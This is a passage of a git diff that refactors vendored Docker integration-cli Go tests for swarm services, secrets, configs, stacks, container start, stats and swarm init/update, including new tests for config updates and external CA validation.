+	out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo=bar")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	service = d.getService(c, "test")
+	service = d.GetService(c, "test")
 	c.Assert(service.Spec.Labels, checker.HasLen, 1)
 	c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar")
 
 	// add label to non-empty set
-	out, err = d.Cmd("service", "update", "test", "--label-add", "foo2=bar")
+	out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo2=bar")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	service = d.getService(c, "test")
+	service = d.GetService(c, "test")
 	c.Assert(service.Spec.Labels, checker.HasLen, 2)
 	c.Assert(service.Spec.Labels["foo2"], checker.Equals, "bar")
 
-	out, err = d.Cmd("service", "update", "test", "--label-rm", "foo2")
+	out, err = d.Cmd("service", "update", "--detach", "test", "--label-rm", "foo2")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	service = d.getService(c, "test")
+	service = d.GetService(c, "test")
 	c.Assert(service.Spec.Labels, checker.HasLen, 1)
 	c.Assert(service.Spec.Labels["foo2"], checker.Equals, "")
 
-	out, err = d.Cmd("service", "update", "test", "--label-rm", "foo")
+	out, err = d.Cmd("service", "update", "--detach", "test", "--label-rm", "foo")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	service = d.getService(c, "test")
+	service = d.GetService(c, "test")
 	c.Assert(service.Spec.Labels, checker.HasLen, 0)
 	c.Assert(service.Spec.Labels["foo"], checker.Equals, "")
 
 	// now make sure we can add again
-	out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar")
+	out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo=bar")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	service = d.getService(c, "test")
+	service = d.GetService(c, "test")
 	c.Assert(service.Spec.Labels, checker.HasLen, 1)
 	c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar")
 }
@@ -90,21 +55,21 @@ func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) {
 func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
+	id := d.CreateSecret(c, swarm.SecretSpec{
+		Annotations: swarm.Annotations{
 			Name: testName,
 		},
-		[]byte("TESTINGDATA"),
+		Data: []byte("TESTINGDATA"),
 	})
 	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
 	testTarget := "testing"
 	serviceName := "test"
 
-	out, err := d.Cmd("service", "create", "--name", serviceName, "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	// add secret
-	out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget))
+	out, err = d.Cmd("service", "update", "--detach", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget))
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
@@ -119,7 +84,7 @@ func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) {
 	c.Assert(refs[0].File.Name, checker.Equals, testTarget)
 
 	// remove
-	out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-rm", testName)
+	out, err = d.Cmd("service", "update", "--detach", "test", "--secret-rm", testName)
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
@@ -128,3 +93,45 @@ func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) {
 	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
 	c.Assert(refs, checker.HasLen, 0)
 }
+
+func (s *DockerSwarmSuite) TestServiceUpdateConfigs(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	testName := "test_config"
+	id := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: testName,
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+	testTarget := "/testing"
+	serviceName := "test"
+
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// add config
+	out, err = d.Cmd("service", "update", "--detach", "test", "--config-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget))
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.ConfigReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 1)
+
+	c.Assert(refs[0].ConfigName, checker.Equals, testName)
+	c.Assert(refs[0].File, checker.Not(checker.IsNil))
+	c.Assert(refs[0].File.Name, checker.Equals, testTarget)
+
+	// remove
+	out, err = d.Cmd("service", "update", "--detach", "test", "--config-rm", testName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 0)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go
index fb896d52d5..f50b5bbf6d 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go
@@ -16,7 +16,7 @@ import (
 func (s *DockerSuite) TestClientSetsTLSServerName(c *check.C) {
 	c.Skip("Flakey test")
 	// there may be more than one hit to the server for each registry request
-	serverNameReceived := []string{}
+	var serverNameReceived []string
 	var serverName string
 
 	virtualHostServer := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go
deleted file mode 100644
index fd9b15449d..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go
+++ /dev/null
@@ -1,186 +0,0 @@
-package main
-
-import (
-	"encoding/json"
-	"io/ioutil"
-	"os"
-	"sort"
-	"strings"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSwarmSuite) TestStackRemoveUnknown(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	stackArgs := append([]string{"stack", "remove", "UNKNOWN_STACK"})
-
-	out, err := d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n")
-}
-
-func (s *DockerSwarmSuite) TestStackPSUnknown(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	stackArgs := append([]string{"stack", "ps", "UNKNOWN_STACK"})
-
-	out, err := d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n")
-}
-
-func (s *DockerSwarmSuite) TestStackServicesUnknown(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	stackArgs := append([]string{"stack", "services", "UNKNOWN_STACK"})
-
-	out, err := d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n")
-}
-
-func (s *DockerSwarmSuite) TestStackDeployComposeFile(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	testStackName := "testdeploy"
-	stackArgs := []string{
-		"stack", "deploy",
-		"--compose-file", "fixtures/deploy/default.yaml",
-		testStackName,
-	}
-	out, err := d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	out, err = d.Cmd("stack", "ls")
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, check.Equals, "NAME        SERVICES\n"+"testdeploy  2\n")
-
-	out, err = d.Cmd("stack", "rm", testStackName)
-	c.Assert(err, checker.IsNil)
-	out, err = d.Cmd("stack", "ls")
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, check.Equals, "NAME  SERVICES\n")
-}
-
-func (s *DockerSwarmSuite) TestStackDeployWithSecretsTwice(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	out, err := d.Cmd("secret", "create", "outside", "fixtures/secrets/default")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	testStackName := "testdeploy"
-	stackArgs := []string{
-		"stack", "deploy",
-		"--compose-file", "fixtures/deploy/secrets.yaml",
-		testStackName,
-	}
-	out, err = d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", "testdeploy_web")
-	c.Assert(err, checker.IsNil)
-
-	var refs []swarm.SecretReference
-	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
-	c.Assert(refs, checker.HasLen, 3)
-
-	sort.Sort(sortSecrets(refs))
-	c.Assert(refs[0].SecretName, checker.Equals, "outside")
-	c.Assert(refs[1].SecretName, checker.Equals, "testdeploy_special")
-	c.Assert(refs[1].File.Name, checker.Equals, "special")
-	c.Assert(refs[2].SecretName, checker.Equals, "testdeploy_super")
-	c.Assert(refs[2].File.Name, checker.Equals, "foo.txt")
-	c.Assert(refs[2].File.Mode, checker.Equals, os.FileMode(0400))
-
-	// Deploy again to ensure there are no errors when secret hasn't changed
-	out, err = d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-}
-
-func (s *DockerSwarmSuite) TestStackRemove(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	stackName := "testdeploy"
-	stackArgs := []string{
-		"stack", "deploy",
-		"--compose-file", "fixtures/deploy/remove.yaml",
-		stackName,
-	}
-	out, err := d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	out, err = d.Cmd("stack", "ps", stackName)
-	c.Assert(err, checker.IsNil)
-	c.Assert(strings.Split(strings.TrimSpace(out), "\n"), checker.HasLen, 2)
-
-	out, err = d.Cmd("stack", "rm", stackName)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Removing service testdeploy_web")
-	c.Assert(out, checker.Contains, "Removing network testdeploy_default")
-	c.Assert(out, checker.Contains, "Removing secret testdeploy_special")
-}
-
-type sortSecrets []swarm.SecretReference
-
-func (s sortSecrets) Len() int           { return len(s) }
-func (s sortSecrets) Swap(i, j int)      { s[i], s[j] = s[j], s[i] }
-func (s sortSecrets) Less(i, j int) bool { return s[i].SecretName < s[j].SecretName }
-
-// testDAB is the DAB JSON used for testing.
-// TODO: Use template/text and substitute "Image" with the result of
-// `docker inspect --format '{{index .RepoDigests 0}}' busybox:latest`
-const testDAB = `{
-    "Version": "0.1",
-    "Services": {
-	"srv1": {
-	    "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0",
-	    "Command": ["top"]
-	},
-	"srv2": {
-	    "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0",
-	    "Command": ["tail"],
-	    "Args": ["-f", "/dev/null"]
-	}
-    }
-}`
-
-func (s *DockerSwarmSuite) TestStackDeployWithDAB(c *check.C) {
-	testRequires(c, ExperimentalDaemon)
-	// setup
-	testStackName := "test"
-	testDABFileName := testStackName + ".dab"
-	defer os.RemoveAll(testDABFileName)
-	err := ioutil.WriteFile(testDABFileName, []byte(testDAB), 0444)
-	c.Assert(err, checker.IsNil)
-	d := s.AddDaemon(c, true, true)
-	// deploy
-	stackArgs := []string{
-		"stack", "deploy",
-		"--bundle-file", testDABFileName,
-		testStackName,
-	}
-	out, err := d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "Loading bundle from test.dab\n")
-	c.Assert(out, checker.Contains, "Creating service test_srv1\n")
-	c.Assert(out, checker.Contains, "Creating service test_srv2\n")
-	// ls
-	stackArgs = []string{"stack", "ls"}
-	out, err = d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, check.Equals, "NAME  SERVICES\n"+"test  2\n")
-	// rm
-	stackArgs = []string{"stack", "rm", testStackName}
-	out, err = d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "Removing service test_srv1\n")
-	c.Assert(out, checker.Contains, "Removing service test_srv2\n")
-	// ls (empty)
-	stackArgs = []string{"stack", "ls"}
-	out, err = d.Cmd(stackArgs...)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, check.Equals, "NAME  SERVICES\n")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go
index b1cea35872..cbe917bf4f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go
@@ -2,12 +2,13 @@ package main
 
 import (
 	"fmt"
-	"os/exec"
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 // Regression test for https://github.com/docker/docker/issues/7843
@@ -42,18 +43,15 @@ func (s *DockerSuite) TestStartAttachReturnsOnError(c *check.C) {
 // gh#8555: Exit code should be passed through when using start -a
 func (s *DockerSuite) TestStartAttachCorrectExitCode(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	out, _, _ := dockerCmdWithStdoutStderr(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1")
+	out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1").Stdout()
 	out = strings.TrimSpace(out)
 
 	// make sure the container has exited before trying the "start -a"
-	dockerCmd(c, "wait", out)
-
-	startOut, exitCode, err := dockerCmdWithError("start", "-a", out)
-	// start command should fail
-	c.Assert(err, checker.NotNil, check.Commentf("startOut: %s", startOut))
-	// start -a did not respond with proper exit code
-	c.Assert(exitCode, checker.Equals, 1, check.Commentf("startOut: %s", startOut))
+	cli.DockerCmd(c, "wait", out)
 
+	cli.Docker(cli.Args("start", "-a", out)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 }
 
 func (s *DockerSuite) TestStartAttachSilent(c *check.C) {
@@ -96,7 +94,6 @@ func (s *DockerSuite) TestStartRecordError(c *check.C) {
 func (s *DockerSuite) TestStartPausedContainer(c *check.C) {
 	// Windows does not support pausing containers
 	testRequires(c, IsPausable)
-	defer unpauseAllContainers()
 
 	runSleepingContainer(c, "-d", "--name", "testing")
 
@@ -106,7 +103,7 @@ func (s *DockerSuite) TestStartPausedContainer(c *check.C) {
 	// an error should have been shown that you cannot start paused container
 	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
 	// an error should have been shown that you cannot start paused container
-	c.Assert(out, checker.Contains, "Cannot start a paused container, try unpause instead.")
+	c.Assert(strings.ToLower(out), checker.Contains, "cannot start a paused container, try unpause instead")
 }
 
 func (s *DockerSuite) TestStartMultipleContainers(c *check.C) {
@@ -162,7 +159,7 @@ func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) {
 		// err shouldn't be nil because start will fail
 		c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
 		// output does not correspond to what was expected
-		c.Assert(out, checker.Contains, "You cannot start and attach multiple containers at once.")
+		c.Assert(out, checker.Contains, "you cannot start and attach multiple containers at once")
 	}
 
 	// confirm the state of all the containers be stopped
@@ -176,14 +173,17 @@ func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) {
 // Test case for #23716
 func (s *DockerSuite) TestStartAttachWithRename(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	dockerCmd(c, "create", "-t", "--name", "before", "busybox")
+	cli.DockerCmd(c, "create", "-t", "--name", "before", "busybox")
 	go func() {
-		c.Assert(waitRun("before"), checker.IsNil)
-		dockerCmd(c, "rename", "before", "after")
-		dockerCmd(c, "stop", "--time=2", "after")
+		cli.WaitRun(c, "before")
+		cli.DockerCmd(c, "rename", "before", "after")
+		cli.DockerCmd(c, "stop", "--time=2", "after")
 	}()
-	_, stderr, _, _ := runCommandWithStdoutStderr(exec.Command(dockerBinary, "start", "-a", "before"))
-	c.Assert(stderr, checker.Not(checker.Contains), "No such container")
+	// FIXME(vdemeester) the intent is not clear and potentially racey
+	result := cli.Docker(cli.Args("start", "-a", "before")).Assert(c, icmd.Expected{
+		ExitCode: 137,
+	})
+	c.Assert(result.Stderr(), checker.Not(checker.Contains), "No such container")
 }
 
 func (s *DockerSuite) TestStartReturnCorrectExitCode(c *check.C) {
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go
index 5cb1a3ea02..454836367f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go
@@ -7,7 +7,8 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
 	"github.com/go-check/check"
 )
 
@@ -33,7 +34,7 @@ func (s *DockerSuite) TestStatsNoStream(c *check.C) {
 	select {
 	case outerr := <-ch:
 		c.Assert(outerr.err, checker.IsNil, check.Commentf("Error running stats: %v", outerr.err))
-		c.Assert(string(outerr.out), checker.Contains, id) //running container wasn't present in output
+		c.Assert(string(outerr.out), checker.Contains, id[:12]) //running container wasn't present in output
 	case <-time.After(3 * time.Second):
 		statsCmd.Process.Kill()
 		c.Fatalf("stats did not return immediately when not streaming")
@@ -130,6 +131,7 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) {
 	stdout, err := statsCmd.StdoutPipe()
 	c.Assert(err, check.IsNil)
 	c.Assert(statsCmd.Start(), check.IsNil)
+	go statsCmd.Wait()
 	defer statsCmd.Process.Kill()
 
 	go func() {
@@ -146,7 +148,7 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) {
 		}
 	}()
 
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil)
 	id <- strings.TrimSpace(out)[:12]
 
@@ -157,3 +159,22 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) {
 		// ignore, done
 	}
 }
+
+func (s *DockerSuite) TestStatsFormatAll(c *check.C) {
+	// Windows does not support stats
+	testRequires(c, DaemonIsLinux)
+
+	cli.DockerCmd(c, "run", "-d", "--name=RunningOne", "busybox", "top")
+	cli.WaitRun(c, "RunningOne")
+	cli.DockerCmd(c, "run", "-d", "--name=ExitedOne", "busybox", "top")
+	cli.DockerCmd(c, "stop", "ExitedOne")
+	cli.WaitExited(c, "ExitedOne", 5*time.Second)
+
+	out := cli.DockerCmd(c, "stats", "--no-stream", "--format", "{{.Name}}").Combined()
+	c.Assert(out, checker.Contains, "RunningOne")
+	c.Assert(out, checker.Not(checker.Contains), "ExitedOne")
+
+	out = cli.DockerCmd(c, "stats", "--all", "--no-stream", "--format", "{{.Name}}").Combined()
+	c.Assert(out, checker.Contains, "RunningOne")
+	c.Assert(out, checker.Contains, "ExitedOne")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go
deleted file mode 100644
index 103d01374c..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go
+++ /dev/null
@@ -1,17 +0,0 @@
-package main
-
-import (
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestStopContainerWithRestartPolicyAlways(c *check.C) {
-	dockerCmd(c, "run", "--name", "verifyRestart1", "-d", "--restart=always", "busybox", "false")
-	dockerCmd(c, "run", "--name", "verifyRestart2", "-d", "--restart=always", "busybox", "false")
-
-	c.Assert(waitRun("verifyRestart1"), checker.IsNil)
-	c.Assert(waitRun("verifyRestart2"), checker.IsNil)
-
-	dockerCmd(c, "stop", "verifyRestart1")
-	dockerCmd(c, "stop", "verifyRestart2")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go
index 8eae162cba..057c0d94c8 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go
@@ -4,7 +4,9 @@ package main
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
+	"encoding/pem"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -14,20 +16,27 @@ import (
 	"strings"
 	"time"
 
+	"github.com/cloudflare/cfssl/helpers"
+	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/daemon"
 	"github.com/docker/libnetwork/driverapi"
 	"github.com/docker/libnetwork/ipamapi"
 	remoteipam "github.com/docker/libnetwork/ipams/remote/api"
+	"github.com/docker/swarmkit/ca/keyutils"
 	"github.com/go-check/check"
 	"github.com/vishvananda/netlink"
+	"gotest.tools/fs"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	getSpec := func() swarm.Spec {
-		sw := d.getSwarm(c)
+		sw := d.GetSwarm(c)
 		return sw.Spec
 	}
 
@@ -44,27 +53,70 @@ func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) {
 	c.Assert(out, checker.Contains, "minimum certificate expiry time")
 	spec = getSpec()
 	c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour)
+
+	// passing an external CA (this is without starting a root rotation) does not fail
+	cli.Docker(cli.Args("swarm", "update", "--external-ca", "protocol=cfssl,url=https://something.org",
+		"--external-ca", "protocol=cfssl,url=https://somethingelse.org,cacert=fixtures/https/ca.pem"),
+		cli.Daemon(d)).Assert(c, icmd.Success)
+
+	expected, err := ioutil.ReadFile("fixtures/https/ca.pem")
+	c.Assert(err, checker.IsNil)
+
+	spec = getSpec()
+	c.Assert(spec.CAConfig.ExternalCAs, checker.HasLen, 2)
+	c.Assert(spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "")
+	c.Assert(spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, string(expected))
+
+	// passing an invalid external CA fails
+	tempFile := fs.NewFile(c, "testfile", fs.WithContent("fakecert"))
+	defer tempFile.Remove()
+
+	result := cli.Docker(cli.Args("swarm", "update",
+		"--external-ca", fmt.Sprintf("protocol=cfssl,url=https://something.org,cacert=%s", tempFile.Path())),
+		cli.Daemon(d))
+	result.Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Err:      "must be in PEM format",
+	})
 }
 
 func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) {
 	d := s.AddDaemon(c, false, false)
 
 	getSpec := func() swarm.Spec {
-		sw := d.getSwarm(c)
+		sw := d.GetSwarm(c)
 		return sw.Spec
 	}
 
-	out, err := d.Cmd("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s")
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	// passing an invalid external CA fails
+	tempFile := fs.NewFile(c, "testfile", fs.WithContent("fakecert"))
+	defer tempFile.Remove()
+
+	result := cli.Docker(cli.Args("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s",
+		"--external-ca", fmt.Sprintf("protocol=cfssl,url=https://somethingelse.org,cacert=%s", tempFile.Path())),
+		cli.Daemon(d))
+	result.Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Err:      "must be in PEM format",
+	})
+
+	cli.Docker(cli.Args("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s",
+		"--external-ca", "protocol=cfssl,url=https://something.org",
+		"--external-ca", "protocol=cfssl,url=https://somethingelse.org,cacert=fixtures/https/ca.pem"),
+		cli.Daemon(d)).Assert(c, icmd.Success)
+
+	expected, err := ioutil.ReadFile("fixtures/https/ca.pem")
+	c.Assert(err, checker.IsNil)
 
 	spec := getSpec()
 	c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour)
 	c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second)
+	c.Assert(spec.CAConfig.ExternalCAs, checker.HasLen, 2)
+	c.Assert(spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "")
+	c.Assert(spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, string(expected))
 
-	c.Assert(d.Leave(true), checker.IsNil)
-	time.Sleep(500 * time.Millisecond) // https://github.com/docker/swarmkit/issues/1421
-	out, err = d.Cmd("swarm", "init")
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	c.Assert(d.SwarmLeave(true), checker.IsNil)
+	cli.Docker(cli.Args("swarm", "init"), cli.Daemon(d)).Assert(c, icmd.Success)
 
 	spec = getSpec()
 	c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 90*24*time.Hour)
@@ -74,15 +126,12 @@ func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) {
 func (s *DockerSwarmSuite) TestSwarmInitIPv6(c *check.C) {
 	testRequires(c, IPv6)
 	d1 := s.AddDaemon(c, false, false)
-	out, err := d1.Cmd("swarm", "init", "--listen-addr", "::1")
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	cli.Docker(cli.Args("swarm", "init", "--listen-add", "::1"), cli.Daemon(d1)).Assert(c, icmd.Success)
 
 	d2 := s.AddDaemon(c, false, false)
-	out, err = d2.Cmd("swarm", "join", "::1")
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	cli.Docker(cli.Args("swarm", "join", "::1"), cli.Daemon(d2)).Assert(c, icmd.Success)
 
-	out, err = d2.Cmd("info")
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	out := cli.Docker(cli.Args("info"), cli.Daemon(d2)).Assert(c, icmd.Success).Combined()
 	c.Assert(out, checker.Contains, "Swarm: active")
 }
 
@@ -96,49 +145,42 @@ func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedAdvertiseAddr(c *check.C) {
 func (s *DockerSwarmSuite) TestSwarmIncompatibleDaemon(c *check.C) {
 	// init swarm mode and stop a daemon
 	d := s.AddDaemon(c, true, true)
-	info, err := d.info()
-	c.Assert(err, checker.IsNil)
+	info := d.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
-	c.Assert(d.Stop(), checker.IsNil)
+	d.Stop(c)
 
 	// start a daemon with --cluster-store and --cluster-advertise
-	err = d.Start("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375")
+	err := d.StartWithError("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375")
 	c.Assert(err, checker.NotNil)
-	content, _ := ioutil.ReadFile(d.logFile.Name())
+	content, err := d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, "--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode")
 
 	// start a daemon with --live-restore
-	err = d.Start("--live-restore")
+	err = d.StartWithError("--live-restore")
 	c.Assert(err, checker.NotNil)
-	content, _ = ioutil.ReadFile(d.logFile.Name())
+	content, err = d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, "--live-restore daemon configuration is incompatible with swarm mode")
 	// restart for teardown
-	c.Assert(d.Start(), checker.IsNil)
-}
-
-// Test case for #24090
-func (s *DockerSwarmSuite) TestSwarmNodeListHostname(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	// The first line should contain "HOSTNAME"
-	out, err := d.Cmd("node", "ls")
-	c.Assert(err, checker.IsNil)
-	c.Assert(strings.Split(out, "\n")[0], checker.Contains, "HOSTNAME")
+	d.Start(c)
 }
 
 func (s *DockerSwarmSuite) TestSwarmServiceTemplatingHostname(c *check.C) {
 	d := s.AddDaemon(c, true, true)
+	hostname, err := d.Cmd("node", "inspect", "--format", "{{.Description.Hostname}}", "self")
+	c.Assert(err, checker.IsNil, check.Commentf(hostname))
 
-	out, err := d.Cmd("service", "create", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}", "busybox", "top")
